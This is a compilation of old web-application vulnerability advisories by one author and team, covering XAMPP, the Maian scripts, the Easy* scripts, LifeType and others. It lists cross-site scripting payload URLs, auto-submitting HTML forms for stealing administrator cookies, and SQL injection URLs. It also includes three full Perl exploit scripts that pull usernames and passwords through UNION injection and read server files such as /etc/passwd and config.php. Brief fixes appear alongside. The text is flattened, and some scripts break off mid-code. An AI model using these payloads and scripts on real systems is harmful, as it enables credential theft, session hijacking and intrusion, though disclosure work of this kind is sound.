Program : Xampp Linux 1.6.7 Type : Multiple Cross Site Scripting Vulnerabilities Alert : Medium Download From : http://puzzle.dl.sourceforge.net/sourceforge/xampp/xampp-linux-1.6.7.tar.gz Discovered by : Khashayar Fereidani Or Dr.Crash My Website : HTTP://FEREIDANI.IR Team Website : Http://IRCRASH.COM Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com Cross Site Scripting Vulnerabilities : Vulnerability work when register_globals set as on . http://Example.com/xampp/iart.php?text=;''scriptalert(document.alert)/script http://Example.com/xampp/ming.php?text=;''scriptalert(document.alert)/script Solution : Remove xampp folder or filter text variable with htmlspecialchars() function Tnx : God HTTP://IRCRASH.COM
MJGuest 6.8 GT Cross Site Scripting Vulnerability
Script : MJGuest 6.8 GT Type : Cross Site Scripting Vulnerability Alert : Medium Discovered by : Khashayar Fereidani Our Team : IRCRASH My Official Website : HTTP://FEREIDANI.IR Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t] com Khashayar Fereidani Offical Website : HTTP://FEREIDANI.IR Script Download : http://www.mdsjack.bo.it/files/mjguest_6.8gt.zip XSS Vulnerability : Invalid Code : ./guestbook.js.php = document.write('a href=javascript:guestbook()' + '?php echo $_GET['link']?' + '/a'); Vulnerable variable : link Address : http://Example/guestbook.js.php?link=[XSS] Solution : Filter link variable with htmlsepcialchars() function . Tnx : God HTTP://IRCRASH.COM
DEV WMS Multiple Vulnerabilities
Script : DEV WMS Type : Multiple Vulnerabilities ( Local file inclusion / Cross Site Scripting / SQL Injection ) Alert : High Discovered by : Khashayar Fereidani Or Dr.Crash My Website : HTTP://FEREIDANI.IR Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com Script Download : http://dev-wms.sourceforge.net/ XSS Vulnerability 1 : Variable Sent Method : GET Vulnerable Variable : session Address : http://Example.com/?session=;scriptalert(document.cookie)/script Solution : filter session variable with htmlspecialchars() function ... Xss Vulnerability 2 : Variable Sent Method : POST Vulnerable Variable : kluc Address : http://Example.com/index.php?session=0action=search change example.com to script address in a real site and save as ircrash.html , open file with browser and see your cookie . html head/head body onLoad=javascript:document.form.submit() form action=http://Example.com/index.php?session=0action=search; method=POST name=form form method=post onSubmit=return validateprm(this)input type=hidden name=prip value=true/input type=hidden name=action value=search/ input type=hidden name=kluc value=#34#39#39#39#60#62#62#62#62scriptalert('xss')/script /form /body /html Solution : filter kluc variable with htmlspecialchars() function ... SQL Injection : Method Of Send : GET Vulnerable Variable : article Address : http://Example.com/index.php?session=0action=readclick=openarticle=[SQL CODE] Solution : Filter danger caracter for article variable ... Local file inclusion : Method Of Send : GET Vulnerable Variable : step Address : http://Example.com/admin/index.php?start=installstep=file.type%00 Solution : Filter step variable with if function ... Tnx : God HTTP://IRCRASH.COM
Easybookmarker 40tr Xss Vulnerability By Khashayar Fereidani
Script : Easybookmarker 40tr Type : Xss Vulnerability Method : POST Alert : High Discovered by : Khashayar Fereidani a.k.a. Dr.Crash My Offical Website : HTTP://FEREIDANI.IR Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t] com Khashayar Fereidani Offical Website : HTTP://FEREIDANI.IR Script Download : http://myiosoft.com/download/EasyBookMarker/easybookmarker-40tr.zip Xss Vulnerability : Variable : rs Send Method : POST Set rs variable with post method in ajaxp_backend.php : scriptalert('xss')/script for test vulnerability html head/head body onLoad=javascript:document.form.submit() form action=http://example/zomplog/ajaxp_backend.php; method=POST name=form input type=hidden name=rs value=#x22;#x20; scriptalert(document.cookie)/script /form /body /html Tnx : God HTTP://IRCRASH.COM
EasyPublish 3.0tr Multiple Vulnerabilities ( Xss / Sql Injection Exploit / File Disclosure Exploit )
#!/usr/bin/perl # # #Script : EasyPublish 3.0tr # #Type : Multiple Vulnerabilities ( Xss / Sql Injection Exploit / File Disclosure Exploit ) # #Variable Method : GET # #Alert : High # # # #Discovered by : Khashayar Fereidani a.k.a. Dr.Crash # #My Official Website : HTTP://FEREIDANI.IR # #Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t] com # # # #Khashayar Fereidani Offical Website : HTTP://FEREIDANI.IR # # # #Script Download : http://myiosoft.com/download/EasyPublish/easypublish-30tr.zip # # # #Xss 1 : http://Example//staticpages/easypublish/index.php?PageSection=0page=individualtable=edp_Newsread=%scriptalert(document.cookie);/script # # # #SQL Injection : # #SQL 1 : http://Example/staticpages/easypublish/index.php?PageSection=0table=edp_Newspage=individualfage=searchread=1+union+all+select+1,concat(0x4c6f67696e3a,puUsername,0x3c656e64757365723e,0x0d0a50617373776f72643a,puPassword,0x3c656e64706173733e),3,4,1,5+FROM+edp_puusers/*;-- # # # # #Tnx : God # # HTTP://IRCRASH.COM # # use LWP; use HTTP::Request; use Getopt::Long; sub header { print * EasyPublish 3.0tr Exploit * *Discovered by : Khashayar Fereidani * *Exploited by : Khashayar Fereidani* *My Official Website : http://fereidani.ir * ; } sub usage { print * Usage : perl $0 http://Example/ ; } $url = ($ARGV[0]); if(!$url) { header(); usage(); exit; } if($url !~ /\//){$url = $url./;} if($url !~ /http:\/\//){$url = http://.$url;} sub xpl1() { $vul = /staticpages/easypublish/index.php?PageSection=0table=edp_Newspage=individualfage=searchread=1+union+all+select+1,concat(0x4c6f67696e3a,puUsername,0x3c656e64757365723e,0x0d0a50617373776f72643a,puPassword,0x3c656e64706173733e),3,4,1,5+FROM+edp_puusers/*; $requestpage = $url.$vul; my $req = HTTP::Request-new(POST,$requestpage); $ua = LWP::UserAgent-new; $ua-agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' ); #$req-referer($url); $req-referer(IRCRASH.COM); $req-content_type('application/x-www-form-urlencoded'); $req-header(content-length = $contlen); $req-content($poststring); $response = $ua-request($req); $content = $response-content; $header = $response-headers_as_string(); @name = split(/Login:/,$content); $name = @name[1]; @name = split(/enduser/,$name); $name = @name[0]; @password = split(/Password:/,$content); $password = @password[1]; @password = split(/endpass/,$password); $password = @password[0]; if(!$name !$password) { print \n\n; print !Exploit failed ! :(\n\n; exit; } print \n Username: .$name.\n\n; print Password: .$password.\n\n; } #XPL2 sub xpl2() { print \n Example For File Address : /home/user/public_html/config.php\n Or /etc/passwd; print \n Enter File Address :; $fil3 = stdin; $vul = /staticpages/easypublish/index.php?PageSection=0table=edp_Newspage=individualfage=searchread=1+union+all+select+1,concat(0x4c6f67696e3a,load_file('$fil3'),0x3c656e64757365723e),3,4,1,5+FROM+edp_puusers/*; $requestpage = $url.$vul; my $req = HTTP::Request-new(POST,$requestpage); $ua = LWP::UserAgent-new; $ua-agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' ); #$req-referer($url); $req-referer(IRCRASH.COM); $req-content_type('application/x-www-form-urlencoded'); $req-header(content-length = $contlen); $req-content($poststring); $response = $ua-request($req); $content = $response-content; $header = $response-headers_as_string(); @name = split(/Login:/,$content); $name = @name[1]; @name = split(/enduser/,$name); $name = @name[0]; if(!$name !$password) { print \n\n; print !Exploit failed ! :(\n\n; exit; } open (FILE, .source..txt); print FILE $name; close (FILE); print File Save In source.txt\n; print ; } #XPL2 END #Starting; print * EasyPublish 3.0tr Exploit * *Discovered by : Khashayar Fereidani * *Exploited by : Khashayar Fereidani* *My Official Website : http://fereidani.ir * * Mod Options
Easyecards 310a Multipe Vulerabilities ( Xss / Sql Injection Exploit / File Disclosure Exploit ) By Khashayar Fereidani
#!/usr/bin/perl # # #Script : Easyecards 310a # #Type : Multipe Vulerabilities ( Xss / Sql Injection Exploit / File Disclosure Exploit ) # #Variable Method : GET # #Alert : High # # # #Discovered by : Khashayar Fereidani a.k.a. Dr.Crash # #My Offical Website : HTTP://FEREIDANI.IR # #Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t] com # # # #Khashayar Fereidani Offical Website : HTTP://FEREIDANI.IR # # # #Script Download : http://myiosoft.com/download/EasyE-Cards/easyecards-310a.zip # # #Xss 1 : http://Example/?ResultHtml=scriptalert('xss')/script # #Xss 2 : http://Example/index.php?step=2dir=''scriptalert('xss')/script # #Xss 3 : http://Example/index.php?step=2SenderName=''scriptalert('xss')/script # #Xss 4 : http://Example/index.php?step=2RecipientName=%3C%3E%3E%3E%3E%27%27%22%3Cscript%3Ealert(%27xss%27)%3C/script%3E # #Xss 5 : http://Example/index.php?step=2SenderMail=''scriptalert('xss')/script # #Xss 6 : http://Example/index.php?step=2RecipientMail=%3C%3E%3E%3E%3E%27%27%22%3Cscript%3Ealert(%27xss%27)%3C/script%3E # # # #SQL Injection : # #SQL 1 : http://Example/index.php?show=pickupsid=9'+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13/* # # # # #Tnx : God # # HTTP://IRCRASH.COM # # use LWP; use HTTP::Request; use Getopt::Long; sub header { print *Easyecards 310a Exploit * *Discovered by : Khashayar Fereidani * *Exploited by : Khashayar Fereidani* *My Official Website : http://fereidani.ir * ; } sub usage { print * Usage : perl $0 http://Example/ ; } $url = ($ARGV[0]); if(!$url) { header(); usage(); exit; } if($url !~ /\//){$url = $url./;} if($url !~ /http:\/\//){$url = http://.$url;} sub xpl1() { $vul = ?show=pickupsid=9'+union+select+0,concat(0x4c6f67696e3a,user,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e),2,3,4,5,6,7,8,9,10,11,12,13+from+mysql.user/*; $requestpage = $url.$vul; my $req = HTTP::Request-new(POST,$requestpage); $ua = LWP::UserAgent-new; $ua-agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' ); #$req-referer($url); $req-referer(IRCRASH.COM); $req-content_type('application/x-www-form-urlencoded'); $req-header(content-length = $contlen); $req-content($poststring); $response = $ua-request($req); $content = $response-content; $header = $response-headers_as_string(); @name = split(/Login:/,$content); $name = @name[1]; @name = split(/enduser/,$name); $name = @name[0]; @password = split(/Password:/,$content); $password = @password[1]; @password = split(/endpass/,$password); $password = @password[0]; if(!$name !$password) { print \n\n; print !Exploit failed ! :(\n\n; exit; } print \n Username: .$name.\n\n; print Password: .$password.\n\n; } #XPL2 sub xpl2() { print \n Example For File Address : /home/user/public_html/config.php\n Or /etc/passwd; print \n Enter File Address :; $fil3 = stdin; $vul = ?show=pickupsid=9'+union+select+0,concat(0x4c6f67696e3a,load_file('$fil3'),0x3c656e64757365723e),2,3,4,5,6,7,8,9,10,11,12,13+from+mysql.user/*; $requestpage = $url.$vul; my $req = HTTP::Request-new(POST,$requestpage); $ua = LWP::UserAgent-new; $ua-agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' ); #$req-referer($url); $req-referer(IRCRASH.COM); $req-content_type('application/x-www-form-urlencoded'); $req-header(content-length = $contlen); $req-content($poststring); $response = $ua-request($req); $content = $response-content; $header = $response-headers_as_string(); @name = split(/Login:/,$content); $name = @name[1]; @name = split(/enduser/,$name); $name = @name[0]; if(!$name !$password) { print \n\n; print !Exploit failed ! :(\n\n; exit; } open (FILE, .source..txt); print FILE $name; close (FILE); print File Save In source.txt\n; print ; } #XPL2 END #Starting; print *Easyecards 310a Exploit * *Discovered by : Khashayar Fereidani * *Exploited by : Khashayar Fereidani* *My Official Website : http://fereidani.ir
Maran PHP Blog Xss By Khashayar Fereidani
Script : Maran PHP Blog Type : XSS (Pasive) Method : GET Alert : Medium Discovered by : Khashayar Fereidani a.k.a. Dr.Crash My Offical Website : HTTP://FEREIDANI.IR Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t] com Khashayar Fereidani Offical Website : HTTP://FEREIDANI.IR Script Download : http://www.maran.pamil-visions.com/download2.php?dir=maranphpfile=maranblog.zip This Is One Xss Vulnerability in ID Variable . Attacker Can Execute JavaScript Code And Get Admin Cookie And Send new article with admin cookie . Xss Address : http://Example/comments.php?id=%3E%3C%3E%27%3Cscript%3Ealert(document.cookie)%3C/script%3E Solution : Edit Source Code And Filter id Variable With htmlspecialchars() function in comments.php ... line 32 : input type='hidden' name='id' value='?echo $_GET['id'];?'br Change It To : input type='hidden' name='id' value='?echo htmlspecialchars($_GET['id']);?'br Tnx : God HTTP://IRCRASH.COM
Easydynamicpages 30tr Multipe Vulerabilities ( Xss / Sql Injection Exploit / File Disclosure Exploit )
#!/usr/bin/perl # # #Script : Easydynamicpages 30tr # #Type : Multipe Vulerabilities ( Xss / Sql Injection Exploit / File Disclosure Exploit ) # #Variable Method : GET # #Alert : High # # # #Discovered by : Khashayar Fereidani a.k.a. Dr.Crash # #My Offical Website : HTTP://FEREIDANI.IR # #Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t] com # # # #Khashayar Fereidani Offical Website : HTTP://FEREIDANI.IR # # # #Script Download : http://myiosoft.com/download/EasyDynamicPages/easydynamicpages-30tr.zip # # # #Xss 1 : http://Example/staticpages/easycalendar/index.php?PageSection=1month=4year=scriptalert(document.cookie);/script # # # #SQL Injection : # #SQL 1 : http://Example/dynamicpages/index.php?page=individualtable=edp_Help_Internal_Newsread=1+union/**/select/**/0,1,2,3,concat(0x4c6f67696e3a,puUsername,0x3c656e64757365723e,0x0d0a50617373776f72643a,puPassword,0x3c656e64706173733e),5,6/**/from/**/edp_puusers/* # # # # #Tnx : God # # HTTP://IRCRASH.COM # # use LWP; use HTTP::Request; use Getopt::Long; sub header { print * Easydynamicpages 30tr Exploit* *Discovered by : Khashayar Fereidani * *Exploited by : Khashayar Fereidani* *My Official Website : http://fereidani.ir * ; } sub usage { print * Usage : perl $0 http://Example/ ; } $url = ($ARGV[0]); if(!$url) { header(); usage(); exit; } if($url !~ /\//){$url = $url./;} if($url !~ /http:\/\//){$url = http://.$url;} sub xpl1() { $vul = /dynamicpages/index.php?page=individualtable=edp_Help_Internal_Newsread=1+union/**/select/**/0,1,2,3,concat(0x4c6f67696e3a,puUsername,0x3c656e64757365723e,0x0d0a50617373776f72643a,puPassword,0x3c656e64706173733e),5,6/**/from/**/edp_puusers/*; $requestpage = $url.$vul; my $req = HTTP::Request-new(POST,$requestpage); $ua = LWP::UserAgent-new; $ua-agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' ); #$req-referer($url); $req-referer(IRCRASH.COM); $req-content_type('application/x-www-form-urlencoded'); $req-header(content-length = $contlen); $req-content($poststring); $response = $ua-request($req); $content = $response-content; $header = $response-headers_as_string(); @name = split(/Login:/,$content); $name = @name[1]; @name = split(/enduser/,$name); $name = @name[0]; @password = split(/Password:/,$content); $password = @password[1]; @password = split(/endpass/,$password); $password = @password[0]; if(!$name !$password) { print \n\n; print !Exploit failed ! :(\n\n; exit; } print \n Username: .$name.\n\n; print Password: .$password.\n\n; } #XPL2 sub xpl2() { print \n Example For File Address : /home/user/public_html/config.php\n Or /etc/passwd; print \n Enter File Address :; $fil3 = stdin; $vul = /dynamicpages/index.php?page=individualtable=edp_Help_Internal_Newsread=1+union/**/select/**/0,1,2,3,concat(0x4c6f67696e3a,load_file('$fil3'),0x3c656e64757365723e),5,6/**/from/**/edp_puusers/*; $requestpage = $url.$vul; my $req = HTTP::Request-new(POST,$requestpage); $ua = LWP::UserAgent-new; $ua-agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' ); #$req-referer($url); $req-referer(IRCRASH.COM); $req-content_type('application/x-www-form-urlencoded'); $req-header(content-length = $contlen); $req-content($poststring); $response = $ua-request($req); $content = $response-content; $header = $response-headers_as_string(); @name = split(/Login:/,$content); $name = @name[1]; @name = split(/enduser/,$name); $name = @name[0]; if(!$name !$password) { print \n\n; print !Exploit failed ! :(\n\n; exit; } open (FILE, .source..txt); print FILE $name; close (FILE); print File Save In source.txt\n; print ; } #XPL2 END #Starting; print * Easydynamicpages 30tr Exploit* *Discovered by : Khashayar Fereidani * *Exploited by : Khashayar Fereidani* *My Official Website : http://fereidani.ir * * Mod Options :* * Mod 1 : Find mysql username
VistaReseller Panel BETA Xss Vulnerability
## # VistaReseller Panel BETA Xss Vulnerability ## # Discovered By Khashayar Fereidani Or Ircrash # Our Team : IRCRASH # IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - Malc0de - R3d.w0rm - Rasool Nasr # Risk : Low ## # Xss Address : http://Example/panel/index.php?option=forums # Variable : [resellerdomain] ## # How Work With it : # Login In VistaReseller Panel And Open Url # Insert http://;scriptalert('xss')/script in Text box and click (Add) Button . # Now Open the Url Again See xss msg ## # Solution : Edit Source Code And Filter Variable With htmlspecialchar() function ... ## # Khashayar Fereidani Email : irancrash[at]gmail[at]com # Tnx : God ##
Maian Uploader v4.0 XSS Vulnerabilities
Script : Maian Uploader v4.0 Type : XSS Vulnerabilities Discovered by : Khashayar Fereidani Or Dr.Crash Our Team : IRCRASH Our Site : Http://IRCRASH.COM IRCRASH Bugtraq : Http://BUGTRAQ.IRCRASH.COM IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - Malc0de - R3d.w0rm - Rasool Nasr Script Download : http://www.maianscriptworld.co.uk/free-php-scripts.html XSS 1 : http://localhost/maian/upload/admin/index.php?cmd=searchprocess=1keywords=;scriptalert('xss')/script XSS 2 : http://Example/admin/inc/header.php?msg_charset=;scriptalert('xss')/script XSS 3 : http://Example/admin/inc/header.php?msg_header9=;scriptalert('xss')/script XSS 4 : http://Example/admin/inc/header.php?msg_header9=;scriptalert('xss')/script XSS 4 : http://Example/index.php?cmd=searchkeywords=;scriptalert('xss')/script You Can Get Admin Session With This Vuln Solution : Edit Source Code And Filter Variable With htmlspecialchar() function ... TNx : God.. Khashayar Fereidani Email : irancrash[at]gmail[dot]com
LifeType 1.2.8
Script : LifeType 1.2.8 Type : XSS Vulnerability Discovered by : Khashayar Fereidani Or Dr.Crash Our Team : IRCRASH Our Site : Http://IRCRASH.COM IRCRASH Bugtraq : Http://BUGTRAQ.IRCRASH.COM IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - Malc0de - R3d.w0rm - Rasool Nasr Script Download : http://mesh.dl.sourceforge.net/sourceforge/lifetype/lifetype-1.2.8.tar.bz2 Type : Cross Site Scripting Method Of Send : POST File Name : http://Example/admin.php?op=editArticleCategories Vulnerable Variable : newBlogUserName Set Add this user Variable : Add Set op Variable : addBlogUser You Can Get Admin Cookie With This Vuln Exploit : Upload This Page And Send Link For Administrator . html head/head #Vulnerabily discovered by Khashayar Fereidani Or Dr.Crash body onLoad=javascript:document.form.submit() form action=http://Example/lifetype/admin.php?op=editArticleCategories; method=POST name=form input type=hidden name=newBlogUserName value=#x22;#x20;[XSS CODE] input type=hidden name=Add this user value=Add input type=hidden name=op value=addBlogUser /form /body /html Solution : Edit Source Code And Filter newBlogUserName Variable With htmlspecialchar() function ... TNx : God.. Khashayar Fereidani Email : irancrash[at]gmail[dot]com IRCRASH TEAM - Http://IRCRASH.COM/
Maian Gallery v2.0 XSS Vulnerability
Script : Maian Gallery v2.0 Type : XSS Vulnerability Discovered by : Khashayar Fereidani Or Dr.Crash Our Team : IRCRASH Our Site : Http://IRCRASH.COM IRCRASH Bugtraq : Http://BUGTRAQ.IRCRASH.COM IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - Malc0de - R3d.w0rm - Rasool Nasr Script Download : http://www.maianscriptworld.co.uk/free-php-scripts.html Xss 1 : http://Example/admin/index.php?cmd=searchsearch=1keywords=;scriptalert(document.cookie)/script Solution : Edit Source Code And Filter Variable via htmlspecialchar() function ... TNx : God.. Khashayar Fereidani Email : irancrash[at]gmail[dot]com
Maian Cart v1.1 XSS Vulnerabilities
Script : Maian Cart v1.1 Type : XSS Vulnerabilities Discovered by : Khashayar Fereidani Or Dr.Crash Our Team : IRCRASH Our Site : Http://IRCRASH.COM IRCRASH Bugtraq : Http://BUGTRAQ.IRCRASH.COM IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - Malc0de - R3d.w0rm - Rasool Nasr Script Download : http://www.maianscriptworld.co.uk/free-php-scripts.html XSS 1 : http://Example/admin/inc/header.php?msg_adminheader=scriptalert(document.cookie)/script XSS 2 : http://Example/admin/inc/header.php?msg_adminheader2=scriptalert(document.cookie)/script XSS 3 : http://Example/admin/inc/header.php?msg_adminheader3=scriptalert(document.cookie)/script XSS 4 : http://Example/admin/inc/header.php?msg_adminheader4=scriptalert(document.cookie)/script Many Variable have Xss Vuln In header.php Xss 5 : http://Example/admin/inc/footer.php?msg_script3=scriptalert(document.cookie)/script Many Variable have Xss Vuln In footer.php Xss 6 : http://Example/maian/cart/index.php?cmd=searchkeywords=scriptalert(document.cookie)/scriptx=0y=0 Solution : Edit Source Code And Filter Variable With htmlspecialchar() function ... TNx : God.. Khashayar Fereidani Email : irancrash[at]gmail[dot]com
Maian Search v1.1 Multiple Vulnerabilities (XSS/SQL INJECTION)
Script : Maian Search v1.1 Type : Multiple Vulnerabilities (XSS/SQL INJECTION) Discovered by : Khashayar Fereidani Or Dr.Crash Our Team : IRCRASH Our Site : Http://IRCRASH.COM IRCRASH Bugtraq : Http://BUGTRAQ.IRCRASH.COM IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - Malc0de - R3d.w0rm - Rasool Nasr Script Download : http://www.maianscriptworld.co.uk/free-php-scripts.html SQL INJECTION : http://Example/search.php?cmd=searchkeywords=[SQL INJECTION] XSS 1 : http://Example/admin/inc/header.php?header=/titlescriptalert('xss')/script XSS 2 : http://Example/admin/inc/header.php?header2=;scriptalert('xss')/script XSS 3 : http://Example/admin/inc/header.php?header3=;scriptalert('xss')/script XSS 4 : http://Example/admin/inc/header.php?header4=;scriptalert('xss')/script XSS 5 : http://Example/admin/inc/header.php?header5=;scriptalert('xss')/script XSS 6 : http://Example/admin/inc/header.php?header6=;scriptalert('xss')/script XSS 7 : http://Example/admin/inc/header.php?header7=;scriptalert('xss')/script XSS 8 : http://Example/admin/inc/header.php?header8=;scriptalert('xss')/script XSS 9 : http://Example/admin/inc/header.php?header9=;scriptalert('xss')/script You Can Get Admin Session With This Vuln Solution : Edit Source Code And Filter Variable With htmlspecialchar() function ... TNx : God.. Khashayar Fereidani Email : irancrash[at]gmail[dot]com
Maian Guestbook v3.2 XSS Vulnerabilities
Script : Maian Guestbook v3.2 Type : XSS Vulnerabilities Discovered by : Khashayar Fereidani Or Dr.Crash Our Team : IRCRASH Our Site : Http://IRCRASH.COM IRCRASH Bugtraq : Http://BUGTRAQ.IRCRASH.COM IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - Malc0de - R3d.w0rm - Rasool Nasr Script Download : http://www.maianscriptworld.co.uk/free-php-scripts.html XSS 1 : http://Example/admin/inc/footer.php?msg_script2=scriptalert(document.cookie)/script XSS 2 : http://Example/admin/inc/footer.php?msg_script3=scriptalert(document.cookie)/script Solution : Edit Source Code And Filter Variable With htmlspecialchar() function ... TNx : God.. Khashayar Fereidani Email : irancrash[at]gmail[dot]com
Maian Weblog v4.0 XSS Vulnerabilities
Script : Maian Weblog v4.0 Type : XSS Vulnerabilities Discovered by : Khashayar Fereidani Or Dr.Crash Our Team : IRCRASH Our Site : Http://IRCRASH.COM IRCRASH Bugtraq : Http://BUGTRAQ.IRCRASH.COM IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - Malc0de - R3d.w0rm - Rasool Nasr Script Download : http://www.maianscriptworld.co.uk/free-php-scripts.html XSS 1 : http://Example/admin/index.php?cmd=searchsearch=1area=blogskeywords=;scriptalert('xss')/script XSS 2 : http://Example/admin/inc/header.php?msg_charset=;scriptalert('xss')/script XSS 3 : http://Example/admin/inc/header.php?msg_header9=;scriptalert('xss')/script XSS 4 : http://Example/admin/inc/header.php?msg_header9=;scriptalert('xss')/script XSS 4 : http://Example/index.php?cmd=searchkeywords=;scriptalert('xss')/script You Can Get Admin Session With This Vuln Solution : Edit Source Code And Filter Variable With htmlspecialchar() function ... TNx : God.. Khashayar Fereidani Email : irancrash[at]gmail[dot]com
Maian Greeting v2.1 Multiple Vulnerabilities (XSS/SQL INJECTION)
Script : Maian Greeting v2.1 Type : Multiple Vulnerabilities (XSS/SQL INJECTION) Discovered by : Khashayar Fereidani Or Dr.Crash Our Team : IRCRASH Our Site : Http://IRCRASH.COM IRCRASH Bugtraq : Http://BUGTRAQ.IRCRASH.COM IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - Malc0de - R3d.w0rm - Rasool Nasr Script Download : http://www.maianscriptworld.co.uk/free-php-scripts.html SQL INJECTION : http://Example/index.php?cmd=searchkeywords=[SQL INJECTION]cat=all XSS 1 : http://Example/admin/inc/header.php?msg_script=;scriptalert('xss')/script XSS 2 : http://Example/admin/inc/header.php?msg_script2=;scriptalert('xss')/script You Can Get Admin Session With This Vuln Solution : Edit Source Code And Filter Variable With htmlspecialchar() function ... TNx : God.. Khashayar Fereidani Email : irancrash[at]gmail[dot]com
Maian Support v1.3 Xss Vulnerabilities
Script : Maian Support v1.3 Type : Xss Vulnerabilities Discovered by : Khashayar Fereidani Or Dr.Crash Our Team : IRCRASH Our Site : Http://IRCRASH.COM IRCRASH Bugtraq : Http://BUGTRAQ.IRCRASH.COM IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - Malc0de - R3d.w0rm - Rasool Nasr Script Download : http://www.maianscriptworld.co.uk/free-php-scripts.html XSS 1 : http://Example/admin/inc/footer.php?msg_script=;scriptalert('xss')/script XSS 2 : http://Example/admin/inc/footer.php?msg_script2=;scriptalert('xss')/script XSS 3 : http://Example/admin/inc/footer.php?msg_script3=;scriptalert('xss')/script XSS 3 : http://Example/admin/inc/header.php?msg_script2=;scriptalert('xss')/script You Can Get Admin Session With This Vuln Solution : Edit Source Code And Filter Variable With htmlspecialchar() function ... TNx : God.. Khashayar Fereidani Email : irancrash[at]gmail[dot]com
Maian Recipe v1.2 Xss Vulnerabilities
Script : Maian Recipe v1.2 Type : Xss Vulnerabilities Discovered by : Khashayar Fereidani Or Dr.Crash Our Team : IRCRASH Our Site : Http://IRCRASH.COM IRCRASH Bugtraq : Http://BUGTRAQ.IRCRASH.COM IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - Malc0de - R3d.w0rm - Rasool Nasr Script Download : http://www.maianscriptworld.co.uk/free-php-scripts.html XSS 1 : http://Example/admin/inc/header.php?header=/titlescriptalert('xss')/script XSS 2 : http://Example/admin/inc/header.php?header2=;scriptalert('xss')/script XSS 3 : http://Example/admin/inc/header.php?header3=;scriptalert('xss')/script XSS 4 : http://Example/admin/inc/header.php?header4=;scriptalert('xss')/script XSS 5 : http://Example/admin/inc/header.php?header5=;scriptalert('xss')/script XSS 6 : http://Example/admin/inc/header.php?header6=;scriptalert('xss')/script XSS 7 : http://Example/admin/inc/header.php?header7=;scriptalert('xss')/script XSS 8 : http://Example/admin/inc/header.php?header8=;scriptalert('xss')/script XSS 9 : http://Example/admin/inc/header.php?header9=;scriptalert('xss')/script You Can Get Admin Session With This Vuln Solution : Edit Source Code And Filter Variable With htmlspecialchar() function ... TNx : God.. Khashayar Fereidani Email : irancrash[at]gmail[dot]com
Maian Music v1.1 Multiple Vulnerabilities (Xss/SQL Injection)
Script : Maian Music v1.1 Type : Multiple Vulnerabilities (Xss/SQL Injection) Discovered by : Khashayar Fereidani Or Dr.Crash Our Team : IRCRASH Our Site : Http://IRCRASH.COM IRCRASH Bugtraq : Http://BUGTRAQ.IRCRASH.COM IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - Malc0de - R3d.w0rm - Rasool Nasr Script Download : http://www.maianscriptworld.co.uk/free-php-scripts.html SQL INJECTION : http://Example/index.php?cmd=albumalbum=[SQL INJECTION] XSS 1 : http://Example/index.php?cmd=searchkeywords=scriptalert(document.cookie)/script XSS 2 : http://Example/admin/inc/footer.php?msg_script=scriptalert(document.cookie)/script You Can Get Admin Session With This Vuln Solution : Edit Source Code And Filter Variable With htmlspecialchar() function ... TNx : God.. Khashayar Fereidani Email : irancrash[at]gmail[dot]com
Maian Links v3.1 XSS Vulnerabilities
Script : Maian Links v3.1 Type : XSS Vulnerabilities Discovered by : Khashayar Fereidani Or Dr.Crash Our Team : IRCRASH Our Site : Http://IRCRASH.COM IRCRASH Bugtraq : Http://BUGTRAQ.IRCRASH.COM IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - Malc0de - R3d.w0rm - Rasool Nasr Script Download : http://www.maianscriptworld.co.uk/free-php-scripts.html XSS 1 : http://Example/admin/inc/footer.php?msg_script3= scriptalert(document.cookie)/script XSS 2 : http://Example/admin/inc/footer.php?msg_script2=scriptalert(document.cookie)/script You Can Get Admin Session With This Vuln Solution : Edit Source Code And Filter Variable With htmlspecialchar() function ... TNx : God.. Khashayar Fereidani Email : irancrash[at]gmail[dot]com
BlackBook v1.0 Multiple XSS Vulnerabilities
